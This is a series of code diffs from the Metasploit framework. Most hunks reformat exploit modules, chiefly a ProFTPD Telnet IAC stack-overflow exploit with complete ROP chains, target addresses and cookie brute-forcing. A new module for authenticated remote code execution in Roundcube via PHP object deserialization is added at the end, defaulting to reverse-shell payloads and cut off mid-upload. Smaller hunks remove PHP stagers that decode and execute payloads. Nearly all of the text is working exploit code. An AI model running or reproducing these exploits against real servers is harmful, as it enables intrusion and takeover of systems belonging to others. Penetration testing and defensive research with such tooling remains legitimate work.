+          succeeding, it will not prevent exploitation. Since the daemon forks in a
+          default configuration, the cookie value will remain the same despite
+          some attempts failing. By making repeated requests, an attacker can eventually
+          guess the cookie value and exploit the vulnerability.

-        The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness
-        and could allow exploitation in semi-reasonable amount of time.
-      },
-      'Author'         => [ 'jduck' ],
-      'References'     =>
-        [
+          The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness
+          and could allow exploitation in semi-reasonable amount of time.
+        },
+        'Author' => [ 'jduck' ],
+        'References' => [
          ['CVE', '2010-4221'],
          ['OSVDB', '68985'],
          ['BID', '44562']
        ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'PrependChrootBreak' => true
        },
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 4096,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 4096,
          # NOTE: \xff are avoided here so we can control the number of them being sent.
          'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\xff",
-          'DisableNops'	=>  'True',
+          'DisableNops'	=> true
        },
-      'Platform'       => [ 'linux' ],
-      'Targets'        =>
-      [
-        #
-        # Automatic targeting via fingerprinting
-        #
-        [ 'Automatic Targeting', { 'auto' => true }  ],
+        'Platform' => [ 'linux' ],
+        'Targets' => [
+          #
+          # Automatic targeting via fingerprinting
+          #
+          [ 'Automatic Targeting', { 'auto' => true } ],
+
+          #
+          # This special one comes first since we dont want its index changing.
+          #
+          [
+            'Debug',
+            {
+              'IACCount' => 8192, # should cause crash writing off end of stack
+              'Offset' => 0,
+              'Ret' => 0x41414242,
+              'Writable' => 0x43434545
+            }
+          ],
+
+          #
+          # specific targets
+          #
+
+          # NOTE: this minimal rop works most of the time, but it can fail
+          # if the proftpd pool memory is in a different order for whatever reason...
+          [
+            'ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1',
+            {
+              'IACCount' => 4096 + 16,
+              'Offset' => 0x102c - 4,
+              # NOTE: All addresses are from the proftpd binary
+              'Ret' => 0x805a547, # pop esi / pop ebp / ret
+              'Writable' => 0x80e81a0, # .data
+              'RopStack' =>
+                [
+                  # Writable is here
+                  0xcccccccc, # unused
+                  0x805a544,  # mov eax,esi / pop ebx / pop esi / pop ebp / ret
+                  0xcccccccc, # becomes ebx
+                  0xcccccccc, # becomes esi
+                  0xcccccccc, # becomes ebp
+                  # quadruple deref the res pointer :)
+                  0x8068886,  # mov eax,[eax] / ret
+                  0x8068886,  # mov eax,[eax] / ret
+                  0x8068886,  # mov eax,[eax] / ret
+                  0x8068886,  # mov eax,[eax] / ret
+                  # skip the pool chunk header
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  0x805bd8e,  # inc eax / adc cl, cl / ret
+                  # execute the data :)
+                  0x0805c26c, # jmp eax
+                ]
+            }
+          ],
+
+          # For the version compiled with symbols :)
+          [
+            'ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)',
+            {
+              'IACCount' => 4096 + 16,
+              'Offset' => 0x1028 - 4,
+              # NOTE: All addresses are from the proftpd binary
+              'Writable' => 0x80ec570, # .data
+              'Ret' => 0x80d78c2, # pop esi / pop ebp / ret
+              'RopStack' =>
+                [
+                  # Writable is here
+                  # 0x0808162a, # jmp esp (works w/esp fixup)
+                  0xcccccccc, # unused becomes ebp
+                  0x80d78c2,  # mov eax,esi / pop esi / pop ebp / ret
+                  0xcccccccc, # unused becomes esi
+                  0xcccccccc, # unused becomes ebp
+                  # quadruple deref the res pointer :)
+                  0x806a915,  # mov eax,[eax] / pop ebp / ret
+                  0xcccccccc, # unused becomes ebp
+                  0x806a915,  # mov eax,[eax] / pop ebp / ret
+                  0xcccccccc, # unused becomes ebp
+                  0x806a915,  # mov eax,[eax] / pop ebp / ret
+                  0xcccccccc, # unused becomes ebp
+                  0x806a915,  # mov eax,[eax] / pop ebp / ret
+                  0xcccccccc, # unused becomes ebp
+                  # skip the pool chunk header
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  0x805d6a9,  # inc eax / adc cl, cl / ret
+                  # execute the data :)
+                  0x08058de6, # jmp eax
+                ]
+            }
+          ],
+
+          [
+            'ProFTPD 1.3.2c Server (Ubuntu 10.04)',
+            {
+              'IACCount' => 1018,
+              'Offset' => 0x420,
+              'CookieOffset' => -0x20,
+              'Writable' => 0x80db3a0, # becomes esi (beginning of .data)
+              'Ret' => 0x805389b, # pop esi / pop ebp / ret
+              'RopStack' =>
+                [
+                  0xcccccccc, # becomes ebp
+
+                  0x8080f04,  # pop eax / ret
+                  0x80db330,  # becomes eax (GOT of mmap64)
+
+                  0x806a716,  # mov eax, [eax] / ret
+                  0x805dd5c,  # jmp eax
+                  0x80607b2,  # add esp, 0x24 / pop ebx / pop ebp / ret
+                  # mmap args
+                  0, 0x20000, 0x7, 0x22, 0xffffffff, 0,
+                  0, # unused
+                  0xcccccccc, # unused
+                  0xcccccccc, # unused
+                  0x100000000 - 0x5d5b24c4 + 0x80db3a4, # becomes ebx
+                  0xcccccccc, # becomes ebp
+
+                  # note, ebx gets fixed above :)
+                  # 0xfe in 'ah' doesn't matter since we have more than enough space.
+                  # now, load an instruction to store to eax
+                  0x808b542, # pop edx / mov ah, 0xfe / inc dword ptr [ebx+0x5d5b24c4] / ret
+                  # becomes edx - mov [eax+ebp*4]; ebx / ret
+                  "\x89\x1c\xa8\xc3".unpack('V').first,
+
+                  # store it :)
+                  0x805c2d0,  # mov [eax], edx / add esp, 0x10 / pop ebx / pop esi / pop ebp / ret
+                  0xcccccccc, # unused
+                  0xcccccccc, # unused
+                  0xcccccccc, # unused
+                  0xcccccccc, # unused
+                  0xcccccccc, # becomes ebx
+                  0xcccccccc, # becomes esi
+                  0xcccccccc, # becomes ebp
+
+                  # Copy the following stub:
+                  # "\x8d\xb4\x24\x21\xfb\xff\xff" # lea esi, [esp-0x4df]
+                  # "\x8d\x78\x12" # lea edi, [eax+0x12]
+                  # "\x6a\x7f"     # push 0x7f
+                  # "\x59"         # pop ecx
+                  # "\xf2\xa5"     # rep movsd
+
+                  0x80607b5,  # pop ebx / pop ebp / ret
+                  0xfb2124b4, # becomes ebx
+                  1, # becomes ebp
+                  0x805dd5c,  # jmp eax
+
+                  0x80607b5,  # pop ebx / pop ebp / ret
+                  0x788dffff, # becomes ebx
+                  2, # becomes ebp
+                  0x805dd5c,  # jmp eax
+
+                  0x80607b5,  # pop ebx / pop ebp / ret
+                  0x597f6a12, # becomes ebx
+                  3, # becomes ebp
+                  0x805dd5c,  # jmp eax
+
+                  0x80607b5,  # pop ebx / pop ebp / ret
+                  0x9090a5f2, # becomes ebx
+                  4, # becomes ebp
+                  0x805dd5c,  # jmp eax
+
+                  0x80607b5,  # pop ebx / pop ebp / ret
+                  0x8d909090, # becomes ebx
+                  0, # becomes ebp
+                  0x805dd5c, # jmp eax
+
+                  # hopefully we dont get here
+                  0xcccccccc,
+                ]
+            }
+          ]

-        #
-        # This special one comes first since we dont want its index changing.
-        #
-        [	'Debug',
-          {
-            'IACCount' => 8192, # should cause crash writing off end of stack
-            'Offset' => 0,
-            'Ret' => 0x41414242,
-            'Writable' => 0x43434545
-          }
        ],
-
-        #
-        # specific targets
-        #
-
-        # NOTE: this minimal rop works most of the time, but it can fail
-        # if the proftpd pool memory is in a different order for whatever reason...
-        [ 'ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1',
-          {
-            'IACCount' => 4096+16,
-            'Offset' => 0x102c-4,
-            # NOTE: All addresses are from the proftpd binary
-            'Ret' => 0x805a547, # pop esi / pop ebp / ret
-            'Writable' => 0x80e81a0, # .data
-            'RopStack' =>
-              [
-                # Writable is here
-                0xcccccccc, # unused
-                0x805a544,  # mov eax,esi / pop ebx / pop esi / pop ebp / ret
-                0xcccccccc, # becomes ebx
-                0xcccccccc, # becomes esi
-                0xcccccccc, # becomes ebp
-                # quadruple deref the res pointer :)
-                0x8068886,  # mov eax,[eax] / ret
-                0x8068886,  # mov eax,[eax] / ret
-                0x8068886,  # mov eax,[eax] / ret
-                0x8068886,  # mov eax,[eax] / ret
-                # skip the pool chunk header
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                0x805bd8e,  # inc eax / adc cl, cl / ret
-                # execute the data :)
-                0x0805c26c, # jmp eax
-              ],
-          }
-        ],
-
-        # For the version compiled with symbols :)
-        [ 'ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)',
-          {
-            'IACCount' => 4096+16,
-            'Offset' => 0x1028-4,
-            # NOTE: All addresses are from the proftpd binary
-            'Writable' => 0x80ec570, # .data
-            'Ret' => 0x80d78c2, # pop esi / pop ebp / ret
-            'RopStack' =>
-              [
-                # Writable is here
-                #0x0808162a, # jmp esp (works w/esp fixup)
-                0xcccccccc, # unused becomes ebp
-                0x80d78c2,  # mov eax,esi / pop esi / pop ebp / ret
-                0xcccccccc, # unused becomes esi
-                0xcccccccc, # unused becomes ebp
-                # quadruple deref the res pointer :)
-                0x806a915,  # mov eax,[eax] / pop ebp / ret
-                0xcccccccc, # unused becomes ebp
-                0x806a915,  # mov eax,[eax] / pop ebp / ret
-                0xcccccccc, # unused becomes ebp
-                0x806a915,  # mov eax,[eax] / pop ebp / ret
-                0xcccccccc, # unused becomes ebp
-                0x806a915,  # mov eax,[eax] / pop ebp / ret
-                0xcccccccc, # unused becomes ebp
-                # skip the pool chunk header
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                0x805d6a9,  # inc eax / adc cl, cl / ret
-                # execute the data :)
-                0x08058de6, # jmp eax
-              ],
-          }
-        ],
-
-        [ 'ProFTPD 1.3.2c Server (Ubuntu 10.04)',
-          {
-            'IACCount' => 1018,
-            'Offset' => 0x420,
-            'CookieOffset' => -0x20,
-            'Writable' => 0x80db3a0, # becomes esi (beginning of .data)
-            'Ret' => 0x805389b,  # pop esi / pop ebp / ret
-            'RopStack' =>
-              [
-                0xcccccccc, # becomes ebp
-
-                0x8080f04,  # pop eax / ret
-                0x80db330,  # becomes eax (GOT of mmap64)
-
-                0x806a716,  # mov eax, [eax] / ret
-                0x805dd5c,  # jmp eax
-                0x80607b2,  # add esp, 0x24 / pop ebx / pop ebp / ret
-                # mmap args
-                0, 0x20000, 0x7, 0x22, 0xffffffff, 0,
-                0, # unused
-                0xcccccccc, # unused
-                0xcccccccc, # unused
-                0x100000000 - 0x5d5b24c4 + 0x80db3a4, # becomes ebx
-                0xcccccccc, # becomes ebp
-
-                # note, ebx gets fixed above :)
-                # 0xfe in 'ah' doesn't matter since we have more than enough space.
-                # now, load an instruction to store to eax
-                0x808b542,  # pop edx / mov ah, 0xfe / inc dword ptr [ebx+0x5d5b24c4] / ret
-                # becomes edx - mov [eax+ebp*4]; ebx / ret
-                "\x89\x1c\xa8\xc3".unpack('V').first,
-
-                # store it :)
-                0x805c2d0,  # mov [eax], edx / add esp, 0x10 / pop ebx / pop esi / pop ebp / ret
-                0xcccccccc, # unused
-                0xcccccccc, # unused
-                0xcccccccc, # unused
-                0xcccccccc, # unused
-                0xcccccccc, # becomes ebx
-                0xcccccccc, # becomes esi
-                0xcccccccc, # becomes ebp
-
-                # Copy the following stub:
-                #"\x8d\xb4\x24\x21\xfb\xff\xff" # lea esi, [esp-0x4df]
-                #"\x8d\x78\x12"  # lea edi, [eax+0x12]
-                #"\x6a\x7f"   # push 0x7f
-                #"\x59"	    # pop ecx
-                #"\xf2\xa5"   # rep movsd
-
-                0x80607b5,  # pop ebx / pop ebp / ret
-                0xfb2124b4, # becomes ebx
-                1, # becomes ebp
-                0x805dd5c,  # jmp eax
-
-                0x80607b5,  # pop ebx / pop ebp / ret
-                0x788dffff, # becomes ebx
-                2, # becomes ebp
-                0x805dd5c,  # jmp eax
-
-                0x80607b5,  # pop ebx / pop ebp / ret
-                0x597f6a12, # becomes ebx
-                3, # becomes ebp
-                0x805dd5c,  # jmp eax
-
-                0x80607b5,  # pop ebx / pop ebp / ret
-                0x9090a5f2, # becomes ebx
-                4, # becomes ebp
-                0x805dd5c,  # jmp eax
-
-                0x80607b5,  # pop ebx / pop ebp / ret
-                0x8d909090, # becomes ebx
-                0, # becomes ebp
-                0x805dd5c,  # jmp eax
-
-                # hopefully we dont get here
-                0xcccccccc,
-              ],
-          }
-        ]
-
-      ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2010-11-01'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2010-11-01',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [UNRELIABLE_SESSION]
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(21),
-      ])
+      ]
+    )
  end

-
  def check
    # NOTE: We don't care if the login failed here...
-    ret = connect
+    connect
    banner = sock.get_once || ''

    # We just want the banner to check against our targets..
@@ -278,7 +287,7 @@ class MetasploitModule < Msf::Exploit::Remote
    if banner =~ /ProFTPD (1\.3\.[23])/i
      banner_array = banner.split('.')

-      if banner_array.count() > 0 && !banner_array[3].nil?
+      if banner_array.count > 0 && !banner_array[3].nil?
        # gets 1 char on the third part of version number.
        relnum = banner_array[2][0..0]
        tmp = banner_array[2].split(' ')
@@ -286,7 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote
        # example: 1.2.3rc ('rc' string)
        extra = tmp[0][1..(tmp[0].length - 1)]
        if relnum == '2'
-          if extra.length > 0
+          if !extra.empty?
            if extra[0..1] == 'rc'
              v = extra[2..extra.length].to_i
              if v && v > 2
@@ -308,7 +317,6 @@ class MetasploitModule < Msf::Exploit::Remote
    return status
  end

-
  def exploit
    connect
    banner = sock.get_once || ''
@@ -316,27 +324,27 @@ class MetasploitModule < Msf::Exploit::Remote
    # Use a copy of the target
    mytarget = target

-    if (target['auto'])
+    if target['auto']
      mytarget = nil

-      print_status("Automatically detecting the target...")
-      if (banner and (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i))) then
+      print_status('Automatically detecting the target...')
+      if (banner && (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i)))
        print_status("FTP Banner: #{banner.strip}")
        version = m[1]
      else
-        fail_with(Failure::NoTarget, "No matching target")
+        fail_with(Failure::NoTarget, 'No matching target')
      end

      regexp = Regexp.escape(version)
-      self.targets.each do |t|
-        if (t.name =~ /#{regexp}/) then
+      targets.each do |t|
+        if (t.name =~ /#{regexp}/)
          mytarget = t
          break
        end
      end

-      if (not mytarget)
-        fail_with(Failure::NoTarget, "No matching target")
+      if !mytarget
+        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected Target: #{mytarget.name}")
@@ -347,14 +355,14 @@ class MetasploitModule < Msf::Exploit::Remote
      end
    end

-    #puts "attach and press any key"; bleh = $stdin.gets
+    # puts "attach and press any key"; bleh = $stdin.gets

    buf = ''
    buf << 'SITE '

-    #buf << "\xcc"
+    # buf << "\xcc"
    if mytarget['CookieOffset']
-      buf << "\x8d\xa0\xfc\xdf\xff\xff"  # lea esp, [eax-0x2004]
+      buf << "\x8d\xa0\xfc\xdf\xff\xff" # lea esp, [eax-0x2004]
    end
    buf << payload.encoded

@@ -370,25 +378,24 @@ class MetasploitModule < Msf::Exploit::Remote
    ].pack('V*')

    if mytarget['RopStack']
-      addrs << mytarget['RopStack'].map { |e|
+      addrs << mytarget['RopStack'].map do |e|
        if e == 0xcccccccc
          rand_text(4).unpack('V').first
        else
          e
        end
-      }.pack('V*')
+      end.pack('V*')
    end

    # Make sure we didn't introduce instability
    addr_badchars = "\x09\x0a\x0b\x0c\x20"
-    if idx = Rex::Text.badchar_index(addrs, addr_badchars)
-      fail_with(Failure::Unknown, ("One or more address contains a bad character! (0x%02x @ 0x%x)" % [addrs[idx,1].unpack('C').first, idx]))
+    if (idx = Rex::Text.badchar_index(addrs, addr_badchars))
+      fail_with(Failure::Unknown, format('One or more address contains a bad character! (0x%<char>02x @ 0x%<index>x)', char: addrs[idx, 1].unpack('C').first, index: idx))
    end

    buf << addrs
    buf << "\r\n"

-
    #
    # In the case of Ubuntu, the cookie has 24-bits of entropy. Further more, it
    # doesn't change while proftpd forks children. Therefore, we can try forever
@@ -397,7 +404,7 @@ class MetasploitModule < Msf::Exploit::Remote
    # NOTE: if the cookie contains one of our bad characters, we're SOL.
    #
    if mytarget['CookieOffset']
-      print_status("!!! Attempting to bruteforce the cookie value! This can takes days. !!!")
+      print_status('!!! Attempting to bruteforce the cookie value! This can takes days. !!!')

      disconnect

@@ -405,17 +412,17 @@ class MetasploitModule < Msf::Exploit::Remote
      off = mytarget['Offset'] + mytarget['CookieOffset']

      cookie = last_cookie = 0
-      #cookie = 0x17ccd600
+      # cookie = 0x17ccd600

      start = Time.now
      last = start - 10

-      while not session_created?
+      until session_created?
        now = Time.now
        if (now - last) >= 10
          perc = (cookie * 100) / max
          qps = ((cookie - last_cookie) >> 8) / 10.0
-          print_status("%.2f%% complete, %.2f attempts/sec - Trying: 0x%x" % [perc, qps, cookie])
+          print_status(format('%<perc>.2f%% complete, %<qps>.2f attempts/sec - Trying: 0x%<cookie>x', perc: perc, qps: qps, cookie: cookie))
          last = now
          last_cookie = cookie
        end
@@ -430,8 +437,8 @@ class MetasploitModule < Msf::Exploit::Remote
        break if cookie > max
      end

-      if not session_created?
-        fail_with(Failure::Unknown, "Unable to guess the cookie value, sorry :-/")
+      if !session_created?
+        fail_with(Failure::Unknown, 'Unable to guess the cookie value, sorry :-/')
      end
    else
      sock.put(buf)
@@ -232,16 +232,4 @@ class MetasploitModule < Msf::Exploit::Remote
    print_status('Injecting stub & triggering payload...')
    execute_via_session(payload_code)
  end
-
-  def php_exec_cmd(encoded_payload)
-    gen = Rex::RandomIdentifier::Generator.new
-    disabled_var = "$#{gen[:dis]}"
-    b64 = Rex::Text.encode_base64(encoded_payload)
-
-    <<~PHP
-      #{php_preamble(disabled_varname: disabled_var)}
-      $c=base64_decode("#{b64}");
-      #{php_system_block(cmd_varname: '$c', disabled_varname: disabled_var)}
-    PHP
-  end
 end
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
        'Privileged' => false,
        'Targets' => [['Automatic', {}]],
        'DisclosureDate' => '2013-05-12',
-        'DisableNops' => 'true',
+        'DisableNops' => true,
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Payload'        =>
        {
          'Space' => 8192,  # Arbitrary limit
-          'DisableNops' =>  'True',
+          'DisableNops' => true,
          'BadChars' => "\x22\x0a"
        },
      'DisclosureDate' => '2018-04-11',  # Vendor notification
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space'    => 256,
          # NOTE: \xff's need to be doubled (per ftp/telnet stuff)
          'BadChars' => "\x00\x09\x0a\x0d\x20\x25\x2f",
-          'DisableNops'	=>  'True',
+          'DisableNops'	=> true,
          'StackAdjustment' 	=> -1500
        },
      'Platform'       => [ 'linux' ],
@@ -155,22 +155,10 @@ class MetasploitModule < Msf::Exploit::Remote
    CheckCode::Appears
  end

-  # Taken from modules/payloads/singles/php/exec.rb
-  def php_exec(cmd)
-    dis = '$' + rand_text_alpha(4..7)
-    shell = <<-END_OF_PHP_CODE
-    #{php_preamble(disabled_varname: dis)}
-    $c = base64_decode("#{Rex::Text.encode_base64(cmd)}");
-    #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-
-    Rex::Text.compress(shell)
-  end
-
  def generate_package
    @payload_path = "resource/#{rand_text_alphanumeric(5..10)}.php"

-    php_payload = target['Type'] == :php ? payload.encoded : php_exec(payload.encoded)
+    php_payload = target['Type'] == :php ? payload.encoded : php_exec_cmd(payload.encoded)

    digest = OpenSSL::Digest.new('SHA256')
    pkey = OpenSSL::PKey::RSA.new(2048)
@@ -88,19 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote
    end
  end

-  # I'll remove this method when PR #20160 is merged. I'm aware of it, thanks
-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = '$' + vars[:dis]
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{encoded_clean_payload}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
-  end
-
  def exploit
    raw = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
    b64 = Rex::Text.encode_base64(raw)
@@ -0,0 +1,238 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization',
+        'Description' => %q{
+          Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution
+          by authenticated users because the _from parameter in a URL is not validated
+          in program/actions/settings/upload.php, leading to PHP Object Deserialization.
+
+          An attacker can execute arbitrary system commands as the web server.
+        },
+        'Author' => [
+          'Maksim Rogov', # msf module
+          'Kirill Firsov', # disclosure and original exploit
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-49113'],
+          ['URL', 'https://fearsoff.org/research/roundcube']
+        ],
+        'DisclosureDate' => '2025-06-02',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Platform' => ['unix', 'linux'],
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Linux Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => [ARCH_CMD],
+              'Type' => :nix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0
+      )
+      )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'Email User to login with', '' ]),
+        OptString.new('PASSWORD', [true, 'Password to login with', '' ]),
+        OptString.new('TARGETURI', [true, 'The URI of the Roundcube Application', '/' ]),
+        OptString.new('HOST', [false, 'The hostname of Roundcube server', ''])
+      ]
+    )
+  end
+
+  class PhpPayloadBuilder
+    def initialize(command)
+      @encoded = Rex::Text.encode_base32(command)
+      @gpgconf = %(echo "#{@encoded}"|base32 -d|sh &#)
+    end
+
+    def build
+      len = @gpgconf.bytesize
+      %(|O:16:"Crypt_GPG_Engine":3:{s:8:"_process";b:0;s:8:"_gpgconf";s:#{len}:"#{@gpgconf}";s:8:"_homedir";s:0:"";};)
+    end
+  end
+
+  def fetch_login_page
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'vars_get' => { '_task' => 'login' }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 200
+    res
+  end
+
+  def check
+    res = fetch_login_page
+
+    unless res.body =~ /"rcversion"\s*:\s*(\d+)/
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract version number")
+    end
+
+    version = Rex::Version.new(Regexp.last_match(1).to_s)
+    print_good("Extracted version: #{version}")
+
+    if version.between?(Rex::Version.new(10100), Rex::Version.new(10509))
+      return CheckCode::Appears
+    elsif version.between?(Rex::Version.new(10600), Rex::Version.new(10610))
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def build_serialized_payload
+    print_status('Preparing payload...')
+
+    stager = case target['Type']
+             when :nix_cmd
+               payload.encoded
+             when :linux_dropper
+               generate_cmdstager.join(';')
+             else
+               fail_with(Failure::BadConfig, 'Unsupported target type')
+             end
+
+    serialized = PhpPayloadBuilder.new(stager).build.gsub('"', '\\"')
+    print_good('Payload successfully generated and serialized.')
+    serialized
+  end
+
+  def exploit
+    token = fetch_csrf_token
+    login(token)
+
+    payload_serialized = build_serialized_payload
+    upload_payload(payload_serialized)
+  end
+
+  def fetch_csrf_token
+    print_status('Fetching CSRF token...')
+
+    res = fetch_login_page
+    html = res.get_html_document
+
+    token_input = html.at('input[name="_token"]')
+    unless token_input
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract CSRF token")
+    end
+
+    token = token_input.attributes.fetch('value', nil)
+    if token.blank?
+      fail_with(Failure::UnexpectedReply, "#{peer} - CSRF token is empty")
+    end
+
+    print_good("Extracted token: #{token}")
+    token
+  end
+
+  def login(token)
+    print_status('Attempting login...')
+    vars_post = {
+      '_token' => token,
+      '_task' => 'login',
+      '_action' => 'login',
+      '_url' => '_task=login',
+      '_user' => datastore['USERNAME'],
+      '_pass' => datastore['PASSWORD']
+    }
+
+    vars_post['_host'] = datastore['HOST'] if datastore['HOST']
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => vars_post,
+      'vars_get' => { '_task' => 'login' }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - No response during login") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Login failed (code #{res.code})") unless res.code == 302
+
+    print_good('Login successful.')
+  end
+
+  def generate_from
+    options = [
+      'compose',
+      'reply',
+      'import',
+      'settings',
+      'folders',
+      'identity'
+    ]
+    options.sample
+  end
+
+  def generate_id
+    random_data = SecureRandom.random_bytes(8)
+    timestamp = Time.now.to_f.to_s
+    Digest::MD5.hexdigest(random_data + timestamp)
+  end
+
+  def generate_uploadid
+    millis = (Time.now.to_f * 1000).to_i
+    "upload#{millis}"
+  end
+
+  def upload_payload(payload_filename)
+    print_status('Uploading malicious payload...')
+
+    # 1x1 transparent pixel image
